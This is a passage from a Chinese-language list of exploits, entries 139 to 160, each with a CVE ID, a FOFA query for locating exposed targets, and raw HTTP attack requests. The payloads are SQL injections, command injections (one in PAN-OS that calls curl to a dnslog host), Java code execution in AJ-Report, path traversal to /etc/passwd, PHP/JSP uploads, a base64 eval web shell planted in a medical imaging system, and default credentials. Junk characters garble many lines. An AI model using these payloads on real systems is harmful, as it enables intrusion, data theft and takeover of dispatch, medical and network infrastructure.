GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1! O+ G# x* j( U" R
Host: x.x.x.x
& q+ W7 A5 _. @$ O6 }: PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
7 S& a3 p' U! Z2 ^. c2 i: ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ b% N) e! J; g$ X! b: h! V$ k$ E5 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, I# L3 X9 h. ?& n/ m# | u! ^8 S
Accept-Encoding: gzip, deflate, br
8 L; h$ H A) J5 jConnection: close0 i, m w5 p; x4 V4 [+ a* h9 l7 O
Upgrade-Insecure-Requests: 1! _$ M6 F% Y, v2 c0 Y+ F
8 ^* S/ Z0 ?0 S2 Y. G* w: i! K
2 J+ X' U! P0 Q! x. O/ U
139. 福建科立讯通信指挥调度平台editemedia.php sql注入3 j& r& r% ~+ E1 k( A
CVE-2024-26224 y+ z! U, F8 J) i4 X7 o( x* A }
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; z( F. Q7 k( v& S) U7 z. j2 YGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
. F/ Q6 p+ q- {# Z$ o, x( NHost: x.x.x.x
( S$ _6 @$ y- h+ t% K, L/ B% gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
. U! X$ `6 O: z# t5 w0 |' |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 U( l! C' v2 H) \: KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 S# e7 R* e9 P( f" H# IAccept-Encoding: gzip, deflate, br
/ M2 i. B$ I9 e+ }+ }2 }; Y2 p" R, |Connection: close) K8 l/ O6 C% b' k& `
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
/ e' z! j3 D* Q0 V4 \, ^8 n5 FUpgrade-Insecure-Requests: 1
( ]3 h$ d6 T' Z
' y/ i% W+ d( f7 n7 ]0 Q6 A# v3 V
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入. a, a6 K$ @5 O' T; {1 h' w1 P
CVE-2024-25662 s3 v! f* l5 T3 j4 W
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"+ b& Z# _6 I0 r# I. ~0 z: t4 ]
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
7 C3 n/ o- H) z2 @! [Host: x.x.x.x5 } T) p; r" M4 r$ w& v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
' w; o. L! ?) V# wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% Y+ R) _" t% l+ n" P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. C h6 [2 d- L: R! G8 {Accept-Encoding: gzip, deflate, br0 u0 Q) V: e" ~
Connection: close6 ~' ?/ x" ?, V& q: o
Cookie: authcode=h8g90 s& h' l9 d' X7 V" U; @- R
Upgrade-Insecure-Requests: 1" O, Y0 n4 O% O; B+ D/ l: h
0 h6 ?" k9 b+ E' s; j @
: D6 V# P: L+ n/ s- F: B
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
4 Q% n- K' k) d& l I7 B9 {FOFA:body="指挥调度管理平台"" o, ]6 j4 B7 k5 Q
POST /app/ext/ajax_users.php HTTP/1.1
9 B) @. n' c1 l9 B5 |+ mHost: your-ip
, P% i2 V& V4 ~5 r# b, BUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
6 o _2 a4 e- z x$ a" T8 Y* s( YContent-Type: application/x-www-form-urlencoded1 M! I- K5 o/ `4 \# E( c
9 A; P1 h; e+ t2 A
: ^' K' f3 x% N. @) Ndep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -: @ U; ]4 {6 U s8 v: b8 [- e- o
. N+ D ~7 J0 ~! {4 o% n" R# F0 R, [' i6 c X' u. n
142. CMSV6车辆监控平台系统中存在弱密码1 s* ?; |5 y P8 ~
CVE-2024-29666
6 Z* P ^! |/ _/ [% UFOFA:body="/808gps/"- |7 |7 s( Q. `# k+ t; U' f! i
admin/admin$ f T0 }8 G! w2 n
143. Netis WF2780 v2.1.40144 远程命令执行
1 S# L0 Z1 G4 u7 e9 ECVE-2024-25850
" ?, U) L% E B/ H0 j* ]- `/ CFOFA:title='AP setup' && header='netis'
- H6 H7 U$ b, Y* oPAYLOAD2 i" H. e! {3 g% s5 C( y
* H& v+ n4 h% a& M/ }144. D-Link nas_sharing.cgi 命令注入+ y3 V$ b% k1 Q. [, ?+ {' [
FOFA:app="D_Link-DNS-ShareCenter"
4 `9 q% N; M& [1 Lsystem参数用于传要执行的命令
, | e) u5 E) C/ M# t: Q L8 UGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
2 B& z) S0 r& n* X) H- EHost: x.x.x.x8 C& u3 H5 L* C& C+ m. M
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0, t* e! x) N- `( q
Connection: close
& e' Q9 I9 i& j. ?6 O9 g% VAccept: */*8 m `3 I/ A8 V5 ]+ j9 G$ ~
Accept-Language: en
( t8 [5 m0 x2 OAccept-Encoding: gzip: y; c# D* F+ w$ e8 P% I* }
2 M* g" C4 z* h3 a2 |9 l+ N7 l# @+ ^
$ C) @/ f& O7 H7 L* x+ b& T F
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
) K: Q( g; ]$ W* Y' C- ~3 }CVE-2024-3400: K: s, J# { P' o( e
FOFA:icon_hash="-631559155"4 k6 X2 n' Q! i3 N& x! K
GET /global-protect/login.esp HTTP/1.1. g1 U! Q' R; X7 h( F1 E
Host: 192.168.30.112:1005- K2 e. D( B: d1 m( U3 W" h3 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84! D6 T! e# v, n8 g
Connection: close
% \ a+ k. z% yCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
, B" n6 h7 x( I* v+ ~' }' E7 o/ cAccept-Encoding: gzip- k" i! s) T' h& B
! u& m: x4 E7 n0 n( _
' o) ]8 ^( [. ]0 T+ r0 ^146. MajorDoMo thumb.php 未授权远程代码执行
9 Z( j a( m$ L0 G0 t; K1 ?+ \CNVD-2024-021751 k( J( q3 r" K! u2 e# q8 E
FOFA:app="MajordomoSL"
, L, J* m; e; gGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.15 Q0 e2 Q# L! Y4 K" l; q
Host: x.x.x.x3 g3 G% \0 c$ ~% ]& |: w8 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.846 P; A; `2 ?5 @
Accept-Charset: utf-8' L1 v1 ~% y+ Q) D9 K- g
Accept-Encoding: gzip, deflate# S, j U5 ~- q7 a* A
Connection: close! B1 }' t/ K8 [8 S6 K! i2 Y
8 ~6 U7 F6 z0 w$ ]
5 B( Q. ?- @, Q9 o147. RaidenMAILD邮件服务器v.4.9.4-路径遍历, ]2 c+ B3 u5 u/ V8 `) o
CVE-2024-32399
" Y) [; \ p& ^) i4 g7 W. q6 [FOFA:body="RaidenMAILD"
5 P u1 M, ], p5 o0 nGET /webeditor/../../../windows/win.ini HTTP/1.12 _* d; ]% Y# ]* S* c g
Host: 127.0.0.1:81) x$ J) x2 ^6 ]3 }
Cache-Control: max-age=0
# b0 G* b1 A+ k1 t# VConnection: close1 `+ t+ Z, P; ~4 P9 L9 i
7 _8 s3 U) b; C, p( A# Y
1 G9 s* V0 K' R) o' B. m148. CrushFTP 认证绕过模板注入
$ U x1 o$ l) y- r5 P& u6 f# a. QCVE-2024-4040
# T* K/ l! b" R$ O$ u3 `2 G ] AFOFA:body="CrushFTP"% x# C% x! N. q! n" s
PAYLOAD6 p8 o; @9 n8 Z$ ?* s Z" ?4 K) z
, W5 U. D+ Q+ x) ?' j4 u2 `+ U1 U149. AJ-Report开源数据大屏存在远程命令执行
6 @+ O& W" R- m6 M/ wFOFA:title="AJ-Report"
& ]: h2 b! [" ?, N; e1 r2 z1 S- p1 [( ~# i( g4 g0 S+ {
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
2 T. \" z- z4 C( |; MHost: x.x.x.x4 O, k- F, V7 Z6 ~0 M2 K) r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. S! x6 m2 }' l R& i" ? o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 v2 Y8 I& `7 X( r1 FAccept-Encoding: gzip, deflate, br9 W* D+ b9 y; X7 T9 G
Accept-Language: zh-CN,zh;q=0.9
, n# }3 b) E* e/ jContent-Type: application/json;charset=UTF-8
' A: D9 x( f& U) V) Y1 X# _Connection: close7 X1 z2 s4 `& L" o ?3 ]0 _6 A
8 ~. f8 Q' y. S* d6 h# R, t/ [$ q{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} S+ O* d( L3 G% N$ \+ ]+ ?! H
$ u8 d4 v, D! ?, S& r
150. AJ-Report 1.4.0 认证绕过与远程代码执行/ C& m$ L* o) ?, V
FOFA:title="AJ-Report"/ b. V% c) k. h: f) W
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
6 B( a- o" @( [/ `" x+ O/ w% hHost: x.x.x.x+ W3 E8 L* Z0 T1 c, U) _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" }& J/ }# H. o( X1 ~4 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 u6 C4 Z& a. b% \3 ?4 bAccept-Encoding: gzip, deflate, br
# F8 Q" e9 Z' C. eAccept-Language: zh-CN,zh;q=0.9
2 H$ N4 t; d' t% I8 s' \4 C: V* PContent-Type: application/json;charset=UTF-8) j' A( X$ j* H% A
Connection: close7 {- U. N' o9 ~! A
Content-Length: 339
/ ]9 D) X. A6 Z9 V0 }: e5 p w2 i! [& S n: y |! a
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}/ ]$ R/ c* c b# B0 |% i1 d
: G3 ^8 ?) {9 X! B" k
2 W( N4 `. l. k E8 [/ k151. AJ-Report 1.4.1 pageList sql注入2 S0 \$ a, P* N4 ]3 x( p
FOFA:title="AJ-Report"
% D7 u( u1 t) H. K3 xGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1+ B7 }7 @, y7 E* v5 |2 V
Host: x.x.x.x
7 K; i5 ]. P& j7 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 T4 ~# n5 k0 [, SConnection: close9 e( K: b6 U0 d3 z" w! @
Accept-Encoding: gzip4 d: M# n; H' }2 x, x
" v- q# T1 ^0 G% Z! s' ?3 b2 L# m+ {+ S
& [6 e: r' b4 i/ q- J
152. Progress Kemp LoadMaster 远程命令执行- ^3 k" O* l: E! d1 [
CVE-2024-1212
7 h1 I P! |# S7 b3 w2 @LoadMaster <= 7.2.59.2 (GA)( ?6 U$ Z$ @# ?0 Q) s5 j1 G$ a, [
LoadMaster<=7.2.54.8 (LTSF)
6 ?% J- A) g2 x$ T7 x+ L* _2 XLoadMaster <= 7.2.48.10 (LTS)
$ b2 ~4 Z |% V! q/ }7 tFOFA:body="LoadMaster"
* C# H. D9 J# ZJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
% f' j) i' [" W6 f0 LGET /access/set?param=enableapi&value=1 HTTP/1.1
( f! d5 \( G4 P( V0 J2 eHost: x.x.x.x+ W- J* v1 r Y$ a. K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1, y, w0 \; G- r; R4 t& y
Connection: close% i- R- g% T/ T# H: {. ]7 K
Accept: */*# S/ @7 e6 i$ N% Y1 W: v ^
Accept-Language: en, Q* c5 U! K9 \' O5 a' Q7 X
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=! Y {* U a& O' K
Accept-Encoding: gzip" \5 K" S+ Z: t' z- E) j
% H1 `) Z) Z7 W( s3 _( ^8 V s2 H1 l8 U: Q) X, E5 Z# K
153. gradio任意文件读取
9 D" Z. {8 s* P1 i- [, nCVE-2024-1561FOFA:body="__gradio_mode__"% h. X+ Z9 ^ X9 s0 d V# o0 y1 C
第一步,请求/config文件获取componets的id
, q+ D; L8 ^3 r4 E) n* n. ?http://x.x.x.x/config- t; r$ f7 k5 x7 g2 R$ O X4 r
2 ~" k- P. C5 |% T( |$ c+ L; K4 @) M% q- |" h d7 O7 A
第二步,将/etc/passwd的内容写入到一个临时文件2 c9 M. D: z' w7 ]6 @( a
POST /component_server HTTP/1.1. o1 R) B! D) c7 t0 V5 [( ^
Host: x.x.x.x: m- ]: q/ `- Y4 L% r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3. t9 R' F6 V+ E8 M5 |- C; h* C# t5 ~
Connection: close& n4 G' G- R2 ?1 y+ k6 W
Content-Length: 1156 z" n' I" t, r1 W! F; ~1 h- q8 h
Content-Type: application/json2 B" ~0 g3 {8 t6 ?6 L
Accept-Encoding: gzip/ B0 w; Y; f: G4 y- L
- B$ e( `# {3 j& E{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
9 V2 S: ?/ j7 }: J/ F* J$ a3 A8 U3 M( ]% Q+ V' Y
, \: Q' i) Z: \: K6 J1 v
第三步访问
8 l! U8 F/ w ^http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd8 C, Q' f- h" R1 \
0 I" x& z/ p( c$ H
, r# b; E0 J# Z& P" b# ^3 i154. 天维尔消防救援作战调度平台 SQL注入
& g: d6 ~# l/ v" |" R% W5 uCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
5 \/ y4 n+ K: i" u- m9 K( \# pPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
' y- r$ x7 [0 B0 s! NHost: x.x.x.x
' U8 ?5 l9 X$ \ W& h( U9 J/ pContent-Length: 106$ }7 l6 P6 Z9 v3 g! q9 l: O
Cache-Control: max-age=0 O6 x0 u& M/ N4 L# w
Upgrade-Insecure-Requests: 1
( R) a4 U9 S' n6 ]' I2 w0 q" C" xOrigin: http://x.x.x.x
( u* X5 j+ F; v" rContent-Type: application/json' ~& J5 K2 f& d" e* U, K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.361 E8 Q: {+ y( Q2 Q$ d6 d1 g! F6 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 G1 x9 B4 l' V* t: @& V
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page" [0 Y _; x$ H3 C. c6 p. R6 ~
Accept-Encoding: gzip, deflate
0 Z( f/ y1 _- z4 j$ ^Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
( Z; c2 Z) K" j( }Connection: close- Z! q. f i0 c4 F( g
7 W/ r7 ?3 n% O
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
/ C" X+ a9 |+ J- ~& m5 [# S1 P) `$ B7 @
, N3 X7 t( a) k" w2 ?4 C* {155. 六零导航页 file.php 任意文件上传, \4 n' v3 k" x4 |9 J* b
CVE-2024-34982
9 c- { r5 m, iFOFA:title=="上网导航 - LyLme Spage"
4 u' [7 L0 K7 f" z: zPOST /include/file.php HTTP/1.12 [# y/ |7 S! c
Host: x.x.x.x3 C# ^1 R- z1 ?* m) d% G. m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
6 Q% I) K, w0 |: a E' ZConnection: close9 m" [( c0 k9 n/ k
Content-Length: 232
% E& S9 g& k' Y. e# z6 U5 yAccept: application/json, text/javascript, */*; q=0.01
$ ]: L2 q" L3 G, A3 J8 z& YAccept-Encoding: gzip, deflate, br, w+ m; g# }% Q J) |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; Q7 \3 a! H- P# _Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
! u @7 k' n+ B% f( G& sX-Requested-With: XMLHttpRequest
- Y0 l0 _9 B: o5 T* M8 d4 P% G2 g @ K( O5 { }7 U4 N
-----------------------------qttl7vemrsold314zg0f
5 t# v3 W0 _6 A3 M# DContent-Disposition: form-data; name="file"; filename="test.php"/ V2 Q# l- k# F( g
Content-Type: image/png9 p; N0 r; w- q; G
0 }. J; O- E0 \6 X% M& b; ?5 e2 E<?php phpinfo();unlink(__FILE__);?>4 p6 r* ~+ d# J+ M0 O2 X
-----------------------------qttl7vemrsold314zg0f--' ^( J% J' C% J4 o4 x1 x2 r! l, _
' Q, _2 r$ D0 O l( w( H6 v3 {% ? Q0 G7 Y9 H
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php# ^6 t# n1 f `, S
/ E2 `7 }( }1 d/ `# R" q7 V
156. TBK DVR-4104/DVR-4216 操作系统命令注入
% ], U$ V$ G ~; s' t BCVE-2024-3721, e( R/ L4 U t/ P1 b$ M! H4 h
FOFA:"Location: /login.rsp"
' L: Y* D/ u ^/ T( }·TBK DVR-4104, t5 M9 B% T" t$ F% u
·TBK DVR-4216
' v, d3 W9 L# Q: V. k- D$ |curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
! c$ _$ m, w0 X$ ?( l+ x% k5 W& [" [, q0 c7 E' E, g5 W* M
8 v# \1 T; t; D& h# H1 ]1 WPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
( U5 s# W" N; i' ~Host: x.x.x.x4 n- H3 f; h% e# u+ s
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. q4 n% \2 v: S# z9 J' ]3 W# m
Connection: close2 d& M$ Z7 M7 e' u' U2 \+ q! ^, _2 g
Content-Length: 0
* ~" ?' N1 e% o- k3 OCookie: uid=1
" @$ {0 Z5 b y) ]. PAccept-Encoding: gzip
3 t6 y: o3 B# k$ F( @4 f' ~) z
# x8 @8 F/ R. I) t' [9 ^) ~; r j+ W: N4 P) ?. u$ V
157. 美特CRM upload.jsp 任意文件上传; e4 f! N1 R2 v
CNVD-2023-069710 a) u, l r9 S; o$ p1 }$ c9 _! K" i
FOFA:body="/common/scripts/basic.js"& M9 e q1 a( E; S9 v2 L, q
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1/ t9 d# j6 \6 I( n
Host: x.x.x.x3 j9 d; c* W) {5 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
6 K7 d/ M. Y1 _Content-Length: 709
; `( z' U h) ]! J$ R8 [! SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 f, [# C7 c8 B. F
Accept-Encoding: gzip, deflate
# {# v/ m# J7 qAccept-Language: zh-CN,zh;q=0.9
N* [1 x; c3 z! p! b9 Q$ MCache-Control: max-age=0
# b1 D9 i$ L7 N3 |! B f- s- Q7 YConnection: close
5 h; E1 w; U- ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN- Q$ G8 p! g7 E8 I
Upgrade-Insecure-Requests: 1
' Y% z4 | W9 G/ R- U. O9 ^/ A1 O& |: K4 c4 }3 d4 U
------WebKitFormBoundary1imovELzPsfzp5dN
7 v% y( ~( j. n! E% Q. h& {Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
3 B e8 u+ D; o, f1 oContent-Type: application/octet-stream- s- ^' W. e+ O/ K# @5 B
6 w4 ^& z- t% i7 W! n" C3 a/ s
nyhelxrutzwhrsvsrafb
5 I/ h8 |4 z7 n+ A, z. P4 k------WebKitFormBoundary1imovELzPsfzp5dN
) ^! r) o+ y% {Content-Disposition: form-data; name="key"
8 j3 d w) l* X0 D1 n8 k9 I
4 _ X: w( P# U( a9 N& J4 \8 f' Enull
O) x- C2 ]; O5 w0 m$ j------WebKitFormBoundary1imovELzPsfzp5dN
+ [& f/ v4 V6 c- t7 y+ oContent-Disposition: form-data; name="form"
* o. e* S6 _2 ?/ X* u; D. l- Z9 a% A0 |
null
6 |. }6 L2 [1 s9 ~------WebKitFormBoundary1imovELzPsfzp5dN
: D" t" q" ]- I( U' c( X7 UContent-Disposition: form-data; name="field"
9 N- R2 Y$ K' J
: H- u8 H( ]) ~3 y% N' j s; k& ]null
2 ?: ^- A/ V# j; {------WebKitFormBoundary1imovELzPsfzp5dN7 O/ Q. d; r* o- K
Content-Disposition: form-data; name="filetitile"2 _# R/ }. h* c4 P4 w% q; K$ `" g3 s
) O: a! k& O2 V7 T! k Znull
: M4 B* v [; p9 _------WebKitFormBoundary1imovELzPsfzp5dN4 P* i6 y' R" k! y
Content-Disposition: form-data; name="filefolder"
5 ?2 [6 P* ?7 r% \
( J/ N" t, @; V7 C4 Tnull
' t1 B8 n; C: i------WebKitFormBoundary1imovELzPsfzp5dN--5 w' n. Y/ s# c: m2 z" h4 [6 p
5 x w, a# S9 T/ M1 H N1 m4 S; l7 _
/ b7 }) i# k8 i
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
$ ?7 }& D0 k- B4 g0 @( g. L6 w7 v' Q0 W& k( r$ ^2 C; V
158. Mura-CMS-processAsyncObject存在SQL注入
2 F! r" S7 c! _# i+ YCVE-2024-32640% d& e3 E* L& O) H' g' ~
FOFA:"Generator: Masa CMS"
. i* J+ C7 V }- c3 ~8 I7 g2 ^POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1+ t5 U/ _0 ~5 V8 O+ c
Host: {{Hostname}}
. J- |2 W! r/ B' ~) x- a6 kContent-Type: application/x-www-form-urlencoded% v8 }0 J5 S- ~
0 p$ [) u9 |' i2 bobject=displayregion&contenthistid=x\'&previewid=1
. d7 s0 X( m! s" |1 s* N/ \
/ W/ y/ t* J8 X7 b3 ^8 s! E, U- T% [2 @' W
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
5 W0 L9 R3 l' A: F0 b' i. U: C! }/ IFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
0 j- F5 s9 m* cPOST /webservices/WebJobUpload.asmx HTTP/1.1
: L z& K$ |# v! v! o+ e \1 {Host: x.x.x.x
" u; I- J' U; uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
& H0 z2 i/ O' S! HContent-Length: 1080. U. B4 K+ N; o0 Z5 u1 p
Accept-Encoding: gzip, deflate( d- R! M0 G0 H+ @. u2 A
Connection: close/ A3 T9 C+ [7 y. l9 M
Content-Type: text/xml; charset=utf-8
1 \* Z8 A% j) L% N2 ISoapaction: "http://rainier/jobUpload"" s* ~0 a1 l& ~7 G7 ^) \3 _$ ~
; O( c7 `4 K7 V) J, e, X
<?xml version="1.0" encoding="utf-8"?>
* s9 D: [) V# G4 I! B( ?4 A0 p<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
' y% ^& W% E1 m1 U' L6 L$ K<soap:Body>
8 J6 Q$ e1 y: _) M<jobUpload xmlns="http://rainier">
[4 e; {# m2 C X( f& x<vcode>1</vcode>
9 @' `1 V& p4 y% J& }6 N9 T e) J5 Z<subFolder></subFolder>
5 d4 R; ]4 U$ M+ T/ I<fileName>abcrce.asmx</fileName>9 k+ O$ ~1 B, }9 @/ \
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
, G6 G9 \8 i1 E# A# A* g; }</jobUpload>$ o" U/ U; i: q6 F2 d9 ^+ l/ z
</soap:Body>
+ f: l6 d: l+ `4 G" M- ^6 s</soap:Envelope>* N7 V3 s- l5 ]1 _$ d
$ T Z: Y8 u5 \. W7 k: X+ E
2 S; q0 [% l2 @0 U, h; c" J/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")) y4 z) g+ C; p
8 f! M: {* j; a9 J8 f
# h* L5 u1 n( y7 j
160. Sonatype Nexus Repository 3目录遍历与文件读取$ j& |1 A8 K C; n7 B3 Y. N# P( x
CVE-2024-4956
9 @. Y0 N1 v2 E: W0 c1 k% iFOFA:title="Nexus Repository Manager": A( r, O1 `) o7 F
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
/ ^; o+ [' }8 T, Q; vHost: x.x.x.x
- Y3 e* H; L4 f% F8 MUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0* ` @) ?4 @( ?5 U' [% H1 E
Connection: close
y% [! d. a* h; [, {+ I6 ?8 S6 mAccept: */*
$ V+ m5 D% t1 B1 x: y, |Accept-Language: en
q6 q* b* ] DAccept-Encoding: gzip
' F4 {8 H+ U2 G' U6 S* m
6 {1 U* \ U& X2 K" F
